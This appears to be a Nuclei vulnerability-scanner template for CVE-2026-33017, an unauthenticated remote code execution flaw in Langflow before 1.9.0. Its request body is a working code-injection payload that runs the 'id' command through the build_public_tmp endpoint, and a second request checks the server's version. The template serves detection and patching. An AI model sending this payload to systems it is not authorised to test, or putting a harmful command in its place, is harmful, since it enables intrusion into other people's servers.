id: CVE-2026-33017

info:
  name: Langflow < 1.9.0 - Remote Code Execution
  author: himind
  severity: critical
  description: |
    Langflow versions prior to 1.9.0 are vulnerable to unauthenticated remote code execution (RCE) via the build_public_tmp endpoint. Attackers can submit a manipulated flow JSON containing Python code that is executed during the build process without proper sandboxing.
  impact: |
    Remote attackers can execute arbitrary Python code without authentication, leading to full system compromise.
  remediation: |
    Update to version 1.9.0 or later.
  reference:
    - https://thehackernews.com/2026/03/critical-langflow-flaw-cve-2026-33017.html
    - https://www.sysdig.com/blog/cve-2026-33017-how-attackers-compromised-langflow-ai-pipelines-in-20-hours
    - https://nvd.nist.gov/vuln/detail/CVE-2026-33017
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-33017
    epss-score: 0.23981
    epss-percentile: 0.96135
    cwe-id: CWE-94
  metadata:
    verified: true
    max-request: 2
    vendor: langflow
    product: langflow
    shodan-query: http.favicon.hash:1727196746
  tags: cve,cve2026,langflow,rce,ai,passive,kev,vkev

variables:
  uuid: "{{uuid}}"

flow: http(1) || http(2)

http:
  - method: POST
    path:
      - "{{BaseURL}}/api/v1/build_public_tmp/{{uuid}}/flow"

    body: |
      {
        "data": {
          "nodes": [
            {
              "data": {
                "node": {
                  "template": {
                    "code": {
                      "value": "def function():\n    import os\n    return os.popen('id').read()"
                    }
                  }
                }
              }
            }
          ]
        }
      }
    headers:
      Content-Type: application/json

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type, "application/json")'
          - 'regex("uid=[0-9]+.*gid=[0-9]+.*", body)'
          - 'contains(body, "xmsg\":")'
        condition: and

  - method: GET
    path:
      - "{{BaseURL}}/api/v1/version"

    matchers:
      - type: dsl
        dsl:
          - "compare_versions(version, '< 1.9.0')"
          - "status_code == 200"
        condition: and

    extractors:
      - type: json
        name: version
        json:
          - ".version"
        internal: true
# digest: 490a004630440220583f7f6298207ff452c3875370b12d0150b79c2a8b3d6e354b5e768a9d63dccd02202ad0fe5aa02581f2e0984766e9eff1702046cbf6c43a7574e81152a097ed00f3:922c64590222798bb761d5b6d8e72950